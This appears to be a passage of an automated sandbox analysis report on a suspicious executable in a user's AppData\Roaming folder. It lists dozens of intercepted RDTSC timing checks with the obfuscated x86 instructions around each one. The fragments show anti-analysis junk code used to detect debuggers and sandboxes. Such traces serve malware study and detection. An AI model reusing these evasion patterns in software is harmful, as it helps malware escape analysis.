Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDD75 second address: 4CDDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+12485B1Eh], esi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F2738E98EE8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F2738E98EE8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000016h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 adc si, B233h 0x0000004c or dword ptr [ebp+122D25E8h], edi 0x00000052 mov dword ptr [ebp+122D1F0Ch], esi 0x00000058 xchg eax, ebx 0x00000059 jp 00007F2738E98EF0h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4CDDEE second address: 4CDDF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A597 second address: 48A59D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A59D second address: 48A5C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E16h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F2738B89E06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A5C2 second address: 48A5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2738E98EE6h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 48A5D2 second address: 48A5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4D0DBB second address: 4D0DD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F2738E98EE6h 0x00000009 js 00007F2738E98EE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 519FCF second address: 519FED instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2738E98EE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738E98EEEh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A276 second address: 51A290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F2738B89E06h 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F2738B89E06h 0x00000014 jc 00007F2738B89E06h 0x0000001a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6C21 second address: 4C6C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6C28 second address: 4C6CED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2738B89E08h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F2738B89E12h 0x00000012 nop 0x00000013 mov cx, di 0x00000016 mov ebx, dword ptr [ebp+1248AE60h] 0x0000001c clc 0x0000001d add eax, ebx 0x0000001f call 00007F2738B89E0Ah 0x00000024 mov edi, 3903AA21h 0x00000029 pop ecx 0x0000002a nop 0x0000002b jnl 00007F2738B89E1Eh 0x00000031 push eax 0x00000032 jmp 00007F2738B89E12h 0x00000037 nop 0x00000038 push 00000004h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F2738B89E08h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov dword ptr [ebp+122D27C7h], ebx 0x0000005a nop 0x0000005b jng 00007F2738B89E1Dh 0x00000061 push edx 0x00000062 jmp 00007F2738B89E15h 0x00000067 pop edx 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c je 00007F2738B89E06h 0x00000072 pop edx 0x00000073 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4C6CED second address: 4C6CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6D0 second address: 51A6D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6D4 second address: 51A6DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51A6DA second address: 51A6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D969 second address: 51D96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D96F second address: 51D987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2738B89E13h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D987 second address: 51D98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D98C second address: 51D9BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E15h 0x00000009 popad 0x0000000a jmp 00007F2738B89E0Dh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9BB second address: 51D9C7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2738E98EE6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9C7 second address: 51D9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51D9CF second address: 51D9E0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2738E98EE6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB3B second address: 51DB66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E12h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2738B89E10h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB66 second address: 51DB78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DB78 second address: 51DBA2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F2738B89E06h 0x00000009 pop esi 0x0000000a js 00007F2738B89E08h 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push esi 0x00000018 pop esi 0x00000019 jng 00007F2738B89E06h 0x0000001f popad 0x00000020 jmp 00007F2738B89E0Ah 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DBA2 second address: 51DBAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DD4E second address: 51DD54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 51DD54 second address: 51DD58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525079 second address: 52507F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5251BB second address: 525200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F2738E98EE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2738E98EF7h 0x00000011 jmp 00007F2738E98EF8h 0x00000016 popad 0x00000017 pushad 0x00000018 jnp 00007F2738E98EF2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525200 second address: 525206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525206 second address: 525227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2738E98EF9h 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525CEC second address: 525CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525CF0 second address: 525D12 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F2738E98EF2h 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 525FBD second address: 525FC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5265AB second address: 5265C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2738E98EF1h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E011 second address: 52E02E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E19h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E02E second address: 52E03C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738E98EE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E03C second address: 52E052 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E12h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E1BD second address: 52E1D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F2738E98EE6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E348 second address: 52E364 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E18h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E364 second address: 52E368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E8B4 second address: 52E8B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52E8B8 second address: 52E8BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 52EA4B second address: 52EA80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F2738B89E17h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738B89E15h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53465D second address: 534661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5347D4 second address: 5347DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534AA6 second address: 534ABF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEDh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534DFB second address: 534E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F2738B89E0Ah 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534E24 second address: 534E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jp 00007F2738E98EE6h 0x0000000f popad 0x00000010 jmp 00007F2738E98EEDh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007F2738E98EE6h 0x00000020 jmp 00007F2738E98EF4h 0x00000025 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5353E9 second address: 5353ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5353ED second address: 5353F9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2738E98EE6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5355C2 second address: 5355CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2738B89E06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5355CE second address: 5355D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F2738E98EE6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 535CF6 second address: 535CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534241 second address: 534245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 534245 second address: 53426A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738B89E06h 0x00000008 jmp 00007F2738B89E13h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jl 00007F2738B89E0Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53426A second address: 53426E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53426E second address: 53428A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F2738B89E16h 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53428A second address: 5342A6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnc 00007F2738E98EF2h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53BDB8 second address: 53BDD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E16h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F2738B89E06h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53BDD8 second address: 53BDDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F033 second address: 53F047 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2738B89E06h 0x00000008 jnl 00007F2738B89E06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F047 second address: 53F04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53F04D second address: 53F051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 53EBFA second address: 53EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A79F second address: 54A7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E15h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F2738B89E20h 0x00000012 jmp 00007F2738B89E14h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A7D7 second address: 54A7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 54A7DB second address: 54A7F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2738B89E06h 0x00000009 jmp 00007F2738B89E0Fh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 553D0B second address: 553D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 553D11 second address: 553D30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jne 00007F2738B89E06h 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2738B89E0Ch 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56083C second address: 56086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnp 00007F2738E98EE6h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2738E98EEFh 0x00000018 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56064D second address: 560651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56707E second address: 567082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 567082 second address: 56708E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 568659 second address: 56865D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56865D second address: 568661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 568661 second address: 56866A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 569B28 second address: 569B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2738B89E06h 0x0000000a jmp 00007F2738B89E15h 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F2738B89E12h 0x00000016 jmp 00007F2738B89E15h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EA31 second address: 56EA35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EA35 second address: 56EA39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EB79 second address: 56EB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EB83 second address: 56EB8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EE42 second address: 56EE4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007F2738E98EE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56EFB4 second address: 56EFEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2738B89E16h 0x00000008 jmp 00007F2738B89E0Bh 0x0000000d jmp 00007F2738B89E12h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F17A second address: 56F180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
